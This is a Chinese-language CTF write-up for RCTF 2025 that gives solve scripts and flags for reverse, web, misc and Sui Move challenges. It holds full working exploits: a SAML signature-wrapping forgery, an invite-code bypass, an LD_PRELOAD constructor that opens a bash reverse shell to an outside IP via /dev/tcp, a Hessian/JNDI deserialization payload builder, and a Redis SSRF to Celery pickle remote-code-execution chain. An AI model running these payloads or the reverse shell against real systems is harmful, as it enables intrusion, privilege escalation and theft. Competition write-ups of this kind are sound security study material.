0x87, 0xF2, 0xE6, 0xE9, 0xD7, 0xD1, 0x97, 0xF9, 0xF8, 0x32,
0x5B, 0xDE, 0x2D, 0xD6, 0xA3, 0x4F, 0x7E, 0xCB, 0x61, 0xB2,
0x3F, 0xBF, 0xB7, 0x1B, 0x0A, 0x84, 0xB3, 0xB4, 0xDE, 0x03,
0x46, 0x7B, 0x83, 0xF0, 0xC4, 0xB3, 0xAB, 0x7B, 0x29, 0xBC,
0x1F, 0xFE, 0x8A, 0x79, 0x26, 0xDA, 0x08, 0x01, 0x85, 0x66,
0x7D, 0xBB, 0xEE, 0x0F, 0x89, 0x59, 0xD4, 0x5F, 0xAC, 0x18,
0xAE, 0x0B, 0x4E, 0xF0, 0xB7, 0x05, 0x5C, 0x81, 0x04, 0x9F,
0xA4, 0x1C, 0x5D, 0xA0, 0xB9, 0x07, 0x92, 0x5C, 0x8A, 0x53,
0xF3, 0xFF, 0xF7, 0xA7, 0xDD, 0x2E, 0xE6, 0xED, 0x0F, 0x77,
0x2C, 0x4A, 0x22, 0xF1, 0x36, 0x4F, 0xA7, 0xEE, 0x0D, 0xD6,
0x04, 0x73, 0x55, 0x5E, 0x3E, 0x93, 0xA4, 0x34, 0x29, 0x67,
0xFC, 0x23, 0x79, 0x19, 0xD8, 0xC9, 0x2B, 0xCF]
print(len(data))
data1 = bytearray(data)
# for i in keyarr:
# print(i)
# print(rc4(data1, (i).encode()))
# print(rc4(data1[::-1], (i).encode()))
key=b'flag:{ThisflagIsGoods}'
print(rc4(data1, key))

Web

Auth

Signature Wrapping attack

后端在校验时是按 type 分支判断要不要校验 invite_code,并且没有对 type 做限制或二次校验

数据库里面type设置的 tinyint类型,所以传字符串,数据库里面会自动转而0存储,然后logout再登录重新刷新session,type就会变为0。 注册时抓包把type值换为string,即可绕过邀请码限制

构造一个新的 assertion(改 NameID 为 admin@rois.team

SAMLResponsePOST 到 SP 的 /saml/acs,利用 SP 的解析顺序漏洞(取第一个 Assertion 做登录),最终访问 /admin 拿 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import base64
import re
import sys
import uuid
from pathlib import Path

import requests
from bs4 import BeautifulSoup
from lxml import etree

IDP_BASE = "http://auth.rctf.rois.team"
SP_ACS = "http://auth-flag.rctf.rois.team:26000/saml/acs"
SP_ADMIN = "http://auth-flag.rctf.rois.team:26000/admin"

session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "keep-alive",
})

def register_and_login():
username = f"hacker_{uuid.uuid4().hex[:6]}"
password = "Passw0rd!"
email = f"{username}@example.com"

session.get(f"{IDP_BASE}/register", timeout=10)

data = {
"type": "string", # 触发 parseInt NaN -> 跳过邀请码
"invitationCode": "",
"username": username,
"email": email,
"password": password,
"confirmPassword": password,
"displayName": username,
"department": "IT",
}
resp = session.post(f"{IDP_BASE}/register", data=data, timeout=10)
if "Invalid invitation code" in resp.text:
raise RuntimeError("register failed, invite code still checked")

# 注册成功后服务端已经把 session.userType 设置成字符串 type,
# 为了让后续 login 重新写入数字 0,需要先注销一次。
session.get(f"{IDP_BASE}/logout", timeout=10)

data = {"username": username, "password": password}
resp = session.post(f"{IDP_BASE}/login", data=data, allow_redirects=True, timeout=10)
if "/portal" not in resp.url:
raise RuntimeError("login failed")
# 访问 portal 以确保 session 中 userType 已刷新为数字 0
session.get(f"{IDP_BASE}/portal", timeout=10)
print(f"[+] Registered & logged in as {username}")
return username

def fetch_saml():
resp = session.get(f"{IDP_BASE}/saml/idp/Flag", allow_redirects=True, timeout=10)
soup = BeautifulSoup(resp.text, "html.parser")
form = soup.find("form", {"id": "samlForm"})
if form is None:
Path("debug_saml.html").write_text(resp.text, encoding="utf-8")
raise RuntimeError(
"Failed to locate samlForm; saved response to debug_saml.html for inspection"
)
saml_resp = form.find("input", {"name": "SAMLResponse"})["value"]
relay_state = ""
relay = form.find("input", {"name": "RelayState"})
if relay:
relay_state = relay["value"]
print("[+] Captured original SAMLResponse")
return saml_resp, relay_state

def forge_assertion(original_b64):
xml_bytes = base64.b64decode(original_b64)
parser = etree.XMLParser(remove_blank_text=True)
doc = etree.fromstring(xml_bytes, parser)

ns = {
"saml": "urn:oasis:names:tc:SAML:2.0:assertion",
"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
"ds": "http://www.w3.org/2000/09/xmldsig#",
}

assertion = doc.xpath("//saml:Assertion", namespaces=ns)[0]
cloned = etree.fromstring(etree.tostring(assertion))
cloned.attrib["ID"] = "_" + uuid.uuid4().hex
nameid = cloned.xpath(".//saml:NameID", namespaces=ns)[0]
nameid.text = "admin@rois.team"

attr_nodes = cloned.xpath(".//saml:Attribute[@Name='email']/saml:AttributeValue", namespaces=ns)
if attr_nodes:
attr_nodes[0].text = "admin@rois.team"

sig = cloned.xpath(".//ds:Signature", namespaces=ns)
for s in sig:
s.getparent().remove(s)

parent = assertion.getparent()
parent.insert(0, cloned)

payload = etree.tostring(doc, encoding="utf-8", xml_declaration=True)
return base64.b64encode(payload).decode()

def post_to_sp(forged_b64, relay_state):
data = {"SAMLResponse": forged_b64}
if relay_state:
data["RelayState"] = relay_state
resp = session.post(SP_ACS, data=data, allow_redirects=True, timeout=10)
if resp.status_code not in (200, 302):
raise RuntimeError("SP ACS rejected response")
print("[+] Forged response accepted by SP")

admin_page = session.get(SP_ADMIN, timeout=10)
if "RCTF{" not in admin_page.text:
raise RuntimeError("flag not found")
flag = re.search(r"RCTF\{[^\}]+\}", admin_page.text)
if flag:
print(f"[+] FLAG: {flag.group(0)}")
else:
print(admin_page.text)

def main():
register_and_login()
saml_b64, relay_state = fetch_saml()
forged_b64 = forge_assertion(saml_b64)
post_to_sp(forged_b64, relay_state)

if __name__ == "__main__":
main()

photographer

登录后上传图片,将图片的 Content-Type 伪造成 -1 ,该值被保存到 photo.type

设置该照片为背景后,用户查询 leftJoin(‘photo’, …) 会让结果集中的 type 列被 photo.type 覆盖

superadmin.php 中比较 Auth::type() < config(‘user_types’)[‘admin’] 即 -1 < 0 为真

直接访问即可获得flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
import requests, re, io, base64, random, string, sys, urllib.parse

def gen_email():
return ''.join(random.choice(string.ascii_lowercase) for _ in range(8)) + '@test.com'

def _extract_csrf(text):
for pat in [
r'name="csrf_token"\s+value="([^"]+)"',
r"name='csrf_token'\s+value='([^']+)'",
r'csrfToken\s*=\s*[\"\']([0-9a-f]{64})[\"\']'
]:
m = re.search(pat, text, re.I)
if m:
return m.group(1)
return None

def _norm_base(base):
base = base.strip().strip('`"\'')
return base.rstrip('/')

def _join(base, path):
return _norm_base(base) + path

def get_csrf(session, base, paths):
for p in paths:
r = session.get(_join(base, p), allow_redirects=True, timeout=10)
t = _extract_csrf(r.text)
if t:
return t
if r.status_code == 200 and len(r.text) > 0:
pass
return None

def register(session, base, email, password, username):
token = get_csrf(session, base, ['/register', '/login'])
if not token:
return {'success': False, 'message': 'csrf not found'}
data = {'username': username, 'email': email, 'password': password, 'confirm_password': password, 'csrf_token': token}
r = session.post(_join(base, '/api/register'), data=data, timeout=10)
return r.json()

def login(session, base, email, password):
token = get_csrf(session, base, ['/login'])
if not token:
return {'success': False, 'message': 'csrf not found'}
data = {'email': email, 'password': password, 'csrf_token': token}
r = session.post(_join(base, '/api/login'), data=data, timeout=10)
return r.json()

def upload_poison(session, base, img_bytes):
files = [('photos[]', ('x.png', io.BytesIO(img_bytes), '-1'))]
r = session.post(_join(base, '/api/photos/upload'), files=files, timeout=20)
return r.json()

def set_background(session, base, photo_id):
token = get_csrf(session, base, ['/settings', '/space', '/compose'])
if not token:
return {'success': False, 'message': 'csrf not found'}
r = session.post(_join(base, '/api/user/background'), data={'photo_id': photo_id, 'csrf_token': token}, timeout=10)
return r.json()

def get_flag(session, base):
r = session.get(_join(base, '/superadmin.php'), timeout=10)
return r.text.strip()

def main():
base = _norm_base(sys.argv[1] if len(sys.argv)>1 else 'http://127.0.0.1:9010')
s = requests.Session()
s.headers.update({'User-Agent': 'Mozilla/5.0'})
email = gen_email()
username = 'u' + ''.join(random.choice(string.ascii_lowercase) for _ in range(6))
password = 'P' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(10))
reg = register(s, base, email, password, username)
if not reg.get('success'):
lg = login(s, base, email, password)
if not lg.get('success'):
print('register/login failed', reg, lg)
return
png_b64 = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/x8AAwMB/edYkNwAAAAASUVORK5CYII='
img = base64.b64decode(png_b64)
up = upload_poison(s, base, img)
if not up.get('success') or not up.get('photos'):
print('upload failed', up)
return
pid = up['photos'][0]['id']
bg = set_background(s, base, pid)
if not bg.get('success'):
print('set bg failed', bg)
return
flag = get_flag(s, base)
print(flag)

if __name__ == '__main__':
main()

RootKB

创建工具可以执行python代码

覆盖sandbox.so. 打LD_PRELOAD

1
2
3
4
5
6
7
8
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
__attribute__ ((__constructor__)) void angel (void){
unsetenv("LD_PRELOAD");
system("bash -c 'bash -i >& /dev/tcp/174.40.149.166/88 <&1'");

}

maybe_easy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
package com.rctf.server.exploit;

import com.caucho.hessian.io.Hessian2Output;
import com.rctf.server.tool.Maybe;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.util.Base64;
import java.util.PriorityQueue;
import java.util.Properties;
import javax.naming.Context;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.ObjectFactory;
import org.springframework.jndi.support.SimpleJndiBeanFactory;


public final class PayloadBuilder {
private PayloadBuilder() {}

public static void main(String[] args) throws Exception {
String rmiHost = "";
int rmiPort = ;
String bindingName = "";
String jndiUrl = String.format("rmi://%s:%d/%s", rmiHost, rmiPort, bindingName);

System.out.println(buildPayload(jndiUrl));
}

private static String buildPayload(String jndiUrl) throws Exception {
PriorityQueue<Object> queue = new PriorityQueue<>(2);
InvocationHandler handler = createInvocationHandler(jndiUrl);
Constructor<Maybe> ctor = Maybe.class.getConstructor(InvocationHandler.class);
Maybe first = ctor.newInstance(handler);
Maybe second = ctor.newInstance(handler);
Field queueField = PriorityQueue.class.getDeclaredField("queue");
queueField.setAccessible(true);
queueField.set(queue, new Object[] { first, second });
Field sizeField = PriorityQueue.class.getDeclaredField("size");
sizeField.setAccessible(true);
sizeField.set(queue, 2);
return encode(queue);
}

private static InvocationHandler createInvocationHandler(String jndiUrl) throws Exception {
SimpleJndiBeanFactory beanFactory = prepareBeanFactory(jndiUrl);

Class<?> factoryClass = Class.forName("org.springframework.beans.factory.config.ObjectFactoryCreatingFactoryBean$TargetBeanObjectFactory");
Constructor<?> factoryCtor = factoryClass.getDeclaredConstructor(BeanFactory.class, String.class);
factoryCtor.setAccessible(true);
ObjectFactory<?> objectFactory = (ObjectFactory<?>) factoryCtor.newInstance(beanFactory, jndiUrl);

Class<?> handlerClass = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
Constructor<?> handlerCtor = handlerClass.getDeclaredConstructor(ObjectFactory.class);
handlerCtor.setAccessible(true);
return (InvocationHandler) handlerCtor.newInstance(objectFactory);
}

private static SimpleJndiBeanFactory prepareBeanFactory(String jndiUrl) {
SimpleJndiBeanFactory beanFactory = new SimpleJndiBeanFactory();
Properties env = new Properties();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
env.put(Context.PROVIDER_URL, jndiUrl);
beanFactory.setJndiEnvironment(env);
return beanFactory;
}

private static String encode(Object payload) throws IOException {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
Hessian2Output h2o = new Hessian2Output(bos);
h2o.getSerializerFactory().setAllowNonSerializable(true);
h2o.writeObject(payload);
h2o.flushBuffer();
return Base64.getEncoder().encodeToString(bos.toByteArray());
}
}

img

RootKB–

添加工具可以运行python代码

题目提示了有cve,在github里面发现2.3.1修复了sanbox ssrf的漏洞

在sanbox测试一下redis连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import redis

def test_redis_connection():
try:
r = redis.Redis(
host='localhost',
port=6379,
password='Password123@redis',
decode_responses=True
)
r.ping()
print("✅ Redis 连接成功!")
return True
except Exception as e:
print(f"❌ Redis 连接失败: {e}")
return False

test_redis_connection()

发现连接成功,那么说明可以ssrf打redis

审计源码发现celery会信任redis传来的数据并进行pickle loads

img

那么思路就是ssrf打redis然后celery pickle反序列化

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
def exp():
import redis, os
from celery import Celery
r = redis.Redis(host='127.0.0.1', port=6379, password='Password123@redis', decode_responses=True)
r.ping()
app = Celery(broker='redis://:Password123%40redis@127.0.0.1:6379/0',
backend='redis://:Password123%40redis@127.0.0.1:6379/0')
class E:
def __reduce__(self):
cmd = 'cat /root/flag > /opt/maxkb-app/sandbox/flag.txt'
return (getattr(os, 'system'), ('/bin/sh -c "' + cmd + '"',))
res = app.send_task('celery:generate_related_by_document', args=(E(), 0, {}, "", []), serializer='pickle', queue='celery')
return str(res.id)

然后sanbox读flag

1
2
3
4
5
6
7
8
9
10
11
12
13
def read_flag():
import os, time
paths = ['/opt/maxkb-app/sandbox/flag.txt', '/flag.txt']
for _ in range(10):
for p in paths:
if os.path.exists(p):
try:
with open(p, 'rb') as f:
return f.read().decode('utf-8', 'ignore')
except Exception:
pass
time.sleep(0.5)
return 'not found'

Misc

签到

控制台输入以下代码:

1
2
3
4
5
6
7
fetch('/?score=100')
.then(res => res.text())
.then(html => {
const match = html.match(/RCTF\{[^}]+\}/);
if(match) console.log('🎉 Flag:', match[0]);
else console.log('未找到 Flag');
});

RCTF{W3lc0m3_T0_RCTF_2025!!!}

Shadows of Asgard

导出http对象,保存随意一个html文件,发现渊恒科技四个字

challenge1:渊恒科技

过滤json

530 19.959810 192.168.77.134 106.52.166.133 HTTP/JSON 1903 POST /assets/cache/5503885e076f4f62.tmp HTTP/1.1 , JSON (application/json)

这个里面发现aeskey aesIV 密文data

写脚本一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import json, base64
from Crypto.Cipher import AES

packet = {
"agentId":"vf3d665af4a0ebc4",
"aesKey":"WzUsMTM5LDI0NSwyMjAsMjMxLDQ2LDIzNCwxNDYsMjQ4LDIxMSwyLDIxMywyLDE2NSw5OCwxMTgsMTAzLDE2MiwzLDE1MCw0LDUzLDE3OSwxOTQsODQsMjA3LDQ1LDI0NSw4OCwxNzksMTkzLDEwMV0=",
"aesIV":"WzEyNCwyMzIsMjU0LDE5LDI1MCw0OSw1MCw4MywyMjksMjQ0LDI4LDIyMiw4MywzMywyMDIsNl0=",
"data":"N2M3N2ZlN2ExYTdhZGMxY2E3MmZhMzY4MzgxMjUxMjQ5ZDZlYjAwNDQwZWJhYmQ2ZDc4MTVkMjE2OTVmMjAwNzRkY2JmYjgwYmExZTVjMjc5ZWY1NzZhNTQxMTU2YTQxZGI0NjQ3MGNlYTIzMDVkOTFlNDcxN2MyMTljNGQwNWJhYjRlMGQ5Zjg1MTA5MDNmZGQyNTM1M2ZjODI5NmY3MjgxYTEyODNkODIzMDQ1Y2NkYTI4MDI3OTc2NTljNzUzNzI0M2U0MmRhMTQ4MGY4ZDg0ZWQ2YTRjMDA1MjUyNWRjYWIwMDk2M2MyODA1MGJmNTEzNjA2NzNhODdiOTNiZDg1NTNkNWU3NDMzMjk3YmRkNTRiOTQyMjJjZDUzMzg3NzIwMmYwNTU0MDNiMjRlODU5NzkwY2Q5MzliYTZjNGVmMDNjMTkzYTU0Zjc3NTUyY2MyYzJhOThlMmI3NDhmZWViZGY0ZDc5YTM5YzBkZGFlZjUyMzVmZjY4YWYxM2Y0NjFiYTkzMTAwMjhhODY3NWEzOGNiNGU3MTc0YmY1Y2QwYzY4YzdiOGE5NjczMGNlMTEyMGJjNWRjNWQ3ZDNiNGY0NTkxMzc1MGRiNzJiZjQ3NzU5YWQwNGRiOWQxYTBlYjlhMzRmOGZlNDZmMDM5OGI1YWI5YWMzMDBiZTlkNmU1MTA4ZTM1ZWQ2YTRiYTA1MTJmNjJkMjM1YTc1YzQyMTc2MGFkOWNlZWU3YWYyYjM4OTk1MjYxZGJkY2E1NDZk"
}

# --- 1. decode Key & IV ---
key = bytes(json.loads(base64.b64decode(packet['aesKey'])))
iv = bytes(json.loads(base64.b64decode(packet['aesIV'])))

# --- 2. decode data: Base64 → hex string ---
hex_str = base64.b64decode(packet['data']).decode()

# --- 3. hex string → bytes (ciphertext) ---
ciphertext = bytes.fromhex(hex_str)

# --- 4. AES decrypt ---
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext)

# --- 5. remove PKCS7 padding ---
pad_len = plaintext[-1]
plaintext = plaintext[:-pad_len]

# --- 6. decode JSON ---
decoded_json = json.loads(plaintext.decode())
print(json.dumps(decoded_json, indent=2))

得到结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"systemInfo": {
"hostname": "DESKTOP-EO5QI9P",
"username": "dell",
"osType": "Windows_NT",
"osRelease": "10.0.17763",
"platform": "win32",
"arch": "x64",
"PID": 6796,
"Process": "C:\\Users\\dell\\Desktop\\Microsoft VS Code\\Code.exe",
"IP": [
"192.168.77.134"
],
"mode": "egress"
},
"timestamp": 1763017668990
}

challenge2:C:\Users\dell\Desktop\Microsoft VS Code\Code.exe

注意到题目线索“layers of encryption and steganography.”

当时导出http对象时 注意到有一些png 怀疑插入text

依然530 19.959810 192.168.77.134 106.52.166.133 HTTP/JSON 1903 POST /assets/cache/5503885e076f4f62.tmp HTTP/1.1 , JSON (application/json)这个包

找到:MmE2ZGY1ZWJiY2UwODM1OTFmOWJkMjEyNWExNDc1MGNlYTNlYzM5NThmOGNkNjNiZDUxOGJlYzBjODZkZjE3YTAzMjk3MWM1NDVmNjE1ZTY4OGJlNTM4OTgwOTFmYmY2NDczZGIzM2ZlYTZiYjFmOWJiMjBjYjIxNTYzNWViM2I2NzBlZDQxMzNhMGI1OTU2NmNhMGY2YTkyMzBmMDdkZA==

一样的aes key和aes IV

替换一下上面的脚本

得到结果:

1
2
3
4
5
{
"command": "pwd",
"outputChannel": "o-1xk645wxtri",
"taskId": "c0c6125e"
}

challenge3:c0c6125e

当将密文替换为:Y2I3MzRjZDFmY2VjY2ZjMzk2OGI5NDUwZTk0NGQzMTc0OGYxZDg0M2FkNTRhNDYwNThiNjFjMjIyZDdjMDdlOGNiNzI4YmNkMDBiMGEzYWM2Mzg3YmM5MjMzMzA1N2U5YTE2ZTZhMjU4NDQ5NDEzMDc1NjY0ZTZjNDg1NzYxYzc5MGQ4ZmExZWQwYzZlZTFiNWIxMjYwYjMzNWU3YmY5NA==的时候,出现结果:

1
2
3
4
5
{
"command": "drives",
"outputChannel": "o-wup8k5bgwft",
"taskId": "4471e3a8"
}

看到drive 应该和C盘有关

根据outputChannel 找到相同的

{“agentId”:”vf3d665af4a0ebc4”,”outputChannel”:”o-wup8k5bgwft”,”data”:”ZTdhYmFmMmI5MWJhYzhiNDc0NTA4NTUxNmJjMjI0MDI2MzdkNDc0NmY3MGU5ZmE5ZDk2NjgzZWNkM2Y5Y2NjODZmMzJhNGUxYWZhNDc5ZjJmYmU0NzNlMmU2OTAyNDcwMGE0OTJkMTNkZjMwN2FjNmM3ZWZhYmJiZDU4MjRkNzg2ODYwOTM3YWJkMmIyYTVjMTJiMGZhODJjZDAyZWQ4YmFhNjdiNzJkN2YyN2QwYjM2YTY3MzQxYWVhMDNhNGQ4ZDQ3Y2Y4NWNkOWZiMzZiMTU0ZDk5ZjM2ZmI4ZWE5ZTg5OGEwNmNiMjE5ZGExNzdlZGE1MGYwYmE4NjE0YjNhMzdlMzkwMTEyZGE1NDI2MGIwNGQwMThjM2NmOTc2Y2QyYzdhNWM0ZjM1NzI1OGUzNDMyNWY1N2Y0MDNmYzE0YTA=”,”timestamp”:1763017695848}

写脚本还原一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import base64
import ast
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

aesKey_b64 = "WzUsMTM5LDI0NSwyMjAsMjMxLDQ2LDIzNCwxNDYsMjQ4LDIxMSwyLDIxMywyLDE2NSw5OCwxMTgsMTAzLDE2MiwzLDE1MCw0LDUzLDE3OSwxOTQsODQsMjA3LDQ1LDI0NSw4OCwxNzksMTkzLDEwMV0="
aesIV_b64 = "WzEyNCwyMzIsMjU0LDE5LDI1MCw0OSw1MCw4MywyMjksMjQ0LDI4LDIyMiw4MywzMywyMDIsNl0="
data_b64 = "ZTdhYmFmMmI5MWJhYzhiNDc0NTA4NTUxNmJjMjI0MDI2MzdkNDc0NmY3MGU5ZmE5ZDk2NjgzZWNkM2Y5Y2NjODZmMzJhNGUxYWZhNDc5ZjJmYmU0NzNlMmU2OTAyNDcwMGE0OTJkMTNkZjMwN2FjNmM3ZWZhYmJiZDU4MjRkNzg2ODYwOTM3YWJkMmIyYTVjMTJiMGZhODJjZDAyZWQ4YmFhNjdiNzJkN2YyN2QwYjM2YTY3MzQxYWVhMDNhNGQ4ZDQ3Y2Y4NWNkOWZiMzZiMTU0ZDk5ZjM2ZmI4ZWE5ZTg5OGEwNmNiMjE5ZGExNzdlZGE1MGYwYmE4NjE0YjNhMzdlMzkwMTEyZGE1NDI2MGIwNGQwMThjM2NmOTc2Y2QyYzdhNWM0ZjM1NzI1OGUzNDMyNWY1N2Y0MDNmYzE0YTA="

aesKey_bytes = base64.b64decode(aesKey_b64)
aesIV_bytes = base64.b64decode(aesIV_b64)
ciphertext = base64.b64decode(data_b64)

aesKey = bytes(ast.literal_eval(aesKey_bytes.decode().strip()))
aesIV = bytes(ast.literal_eval(aesIV_bytes.decode().strip()))

# 如果 ciphertext 是 hex 字符串,再转一次
try:
ciphertext = bytes.fromhex(ciphertext.decode())
except:
pass

cipher = AES.new(aesKey, AES.MODE_CBC, aesIV)
plaintext = cipher.decrypt(ciphertext)

# 尝试去掉 unpad 看看
print(plaintext[:200]) # 只打印前200字节

得到结果:

b’Drive: C:\nCreated: Fri Sep 14 2018 23:09:26 GMT-0700 (Pacific Daylight Time)\nModified: Wed Nov 12 2025 22:52:43 GMT-0800 (Pacific Standard Time)\n—\n\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b’

challenge4:2018-09-14 23:09:26

将M2EyODkyNWFmM2U2MDhlNzJmYjM5ZjA0Zjg2OWYzYTg3YzM1MTNkYzJmZjFmOGJkM2I4ODQwZjE4ZjFhN2E1ZjRhMTM0OWRlNzFmNGU5NjgzZGE4YjE1Y2E5OTE2MWJlODVjYWE0MjNjZGUxMzI4NWM0ZjUyODk0OWE1NWY4YzlmZTc5Mzg2N2U4YTlmM2NlOTczMTQ5NGI0MzVmMmI4MzEwM2ZjMTc5YWY5ODc4MTc3ZjFiMmQwNjcyMzYwNWI4ZWQzZDI0NTZiMDYyODgwM2JiNjAxNDYzZWI5MjFiN2I1NjUwZjY1ZWVmZGEwNzY3MjAwZjVjMmQzNzJlMzQwNGI0M2NiNWFiOTY4MTE4OTUxYjI4YzY5M2I0MmRiNmYyZGZmNzFiN2UxNWMzNWFjZjA4OTQ1ZDQ0MTRmNTY5ZTkwZWM4NDcyZWFlZDE5ZDE3ZjZmODc0NGM4Y2JkOGMyODE0OGUxMDdmMTQzM2NhOWUwYzYzODJlNWVlNzYzODBjY2ZjMGQ0YjhlZDE2MTY3NDJmMDU3MWYzYmM0MmQ1ZjVkMjY4ZTFhM2ZiNDU3OTEzMTJkZTlmNTRjZTFkMjU2OTdiODZmYjExZTM1MWY4MWIwNzliOGRmZjA3ZGQ3ZDhmYzAyZDRkZDY4NjNkNDk5ZDE3ZmRkYTg1NzBkMjMxODNkMzU3N2M5OTcwYjE1YjU5YWZkMzNiYjM2NDVhZDE1Yw==替换进原脚本 得到结果:

1
2
3
4
5
6
7
{
"outputChannel": "o-2ggeq7qpt2u",
"taskId": "shell-upload-1763017722153",
"fileId": "dd45c631-ec19-40b1-aa1b-e3dea35d21ae",
"filePath": "C:\\Users\\dell\\Desktop\\Microsoft VS Code\\fllllag.txt",
"fileData": "UkNURnt0aGV5IGFsd2F5cyBzYXkgUmF2ZW4gaXMgaW5hdXNwaWNpb3VzfQ=="
}

Base64解码

答案:RCTF{they always say Raven is inauspicious}

综上:RCTF{Wh3n_Th3_R4v3n_S1ngs_4sg4rd_F4lls_S1l3nt}

Asgard Fallen Down

吃了一上午⑩后,发现除了向/connect发送的请求之外,要么404,要么无响应

然后在第207个流发现有个不明所以的build和version。然后想到前面就是aes,尝试了一下。后面就是简单的解密了

img

  • 在他的代理建立连接后,洛基执行了第一个什么命令?

img

img

答案 spawn whoami

  • 洛基特工的每次心跳之间经过了多少秒?

img

img

然后猜一下,是10秒

  • 哪个处理器型号驱动雷神的机器?

img

img

答案 Intel64 Family 6 Model 191 Stepping 2, GenuineIntel

  • 工具 GitHub 仓库名称

Connect 还有一个地方是2787流

img

传了大量数据解密发现是一张图片

img

img

img

答案 TscanPlus

拿到flag RCTF{Wh1l3_Th0r_Struck_L1ghtn1ng_L0k1_St0l3_Th3_Thr0n3}

img

Speak Softly Love

grok的信息搜集能力还是太强了

  • Challenge 1: Video ID

img

答案 8ssDGBTssUI

  • Challenge 2: Code Revision

img

img

img

img

答案 r178

  • Challenge 3: Name-pronunciation URL

img

img

答案 https://mateusz.viste.fr/mateusz.ogg

  • Challenge 4: Donation address

AI 还是太强了

img

答案 16TofYbGd86C7S6JuAuhGkX4fbmC9QtzwT

拿到flag RCTF{wh3n_8086_s4ng_s0f7ly_0f_l0v3}

img

Vault

Sui Move 合约 + Rust 沙箱框架

公开共享铸币能力 TreasuryCap 导致无限铸币

获取 TreasuryCap 、AirdropTracker 、Vault 的可变引用

调用空投登记

无限铸币满足门槛

购买 Flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
module solution::solution {
use sui::tx_context::{Self, TxContext};
use sui::coin::{Self, Coin, TreasuryCap};
use challenge::vault_coin::VAULT_COIN;
use challenge::vault::{Self, Vault, AirdropTracker};

public entry fun solve(
vault: &mut Vault,
tracker: &mut AirdropTracker,
treasury_cap: &mut TreasuryCap<VAULT_COIN>,
ctx: &mut TxContext
) {
challenge::vault::request_airdrop(tracker, treasury_cap, ctx);
let proof = coin::mint(treasury_cap, 100_000_000_000, ctx);
challenge::vault::buy_flag(tracker, vault, proof, ctx);
}
}
[package]
name = "solution"
version = "0.0.1"
edition = "2024.alpha"

[dependencies]
Sui = { git = "https://github.com/MystenLabs/sui.git", subdir = "crates/sui-framework/packages/sui-framework", rev = "mainnet" }

[dependencies.challenge]
version = '1.0.0'
local = '../dependency'

[addresses]
solution = "0x0"

challenge = "0x982201612e1d635515eec8e8b8bdc65cc120931543090e9efde3e92cdd61c247"
import socket
import os

HOST = "1.95.2.49"
PORT = 26002

def main():
base_dir = os.path.dirname(os.path.abspath(__file__))
mv_path = os.path.join(base_dir, "..", "build", "solution", "bytecode_modules", "solution.mv")
if not os.path.exists(mv_path):
raise FileNotFoundError(mv_path)
data = open(mv_path, "rb").read()
s = socket.create_connection((HOST, PORT))
try:
s.recv(4096)
except Exception:
pass
s.sendall(data)
s.settimeout(10)
out = b""
while True:
try:
chunk = s.recv(4096)
if not chunk:
break
out += chunk
except socket.timeout:
break
print(out.decode(errors="ignore"))

if __name__ == "__main__":
main()

Wanna Feel Love

垃圾邮件隐写

https://www.spammimic.com/decode.cgi

img

Challenge1:Don’t just listen to the sound; this file is hiding an ‘old relic.’ Try looking for the ‘comments’ that the player isn’t supposed to see.

010打开challenge.xm文件 发现一句提示词 提示使用OpenMPT打开xm文件

然后发现comments:They say if you trace the peaks carefully enough, it spells a sentence that was never meant to be heard.以及:Can anybody extract the urban legend information about “feel” from this XM file?

然后samples文件夹发现feel音频 保存为Feel.falc 联系“peak”线索 先想到了高低音量隐写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
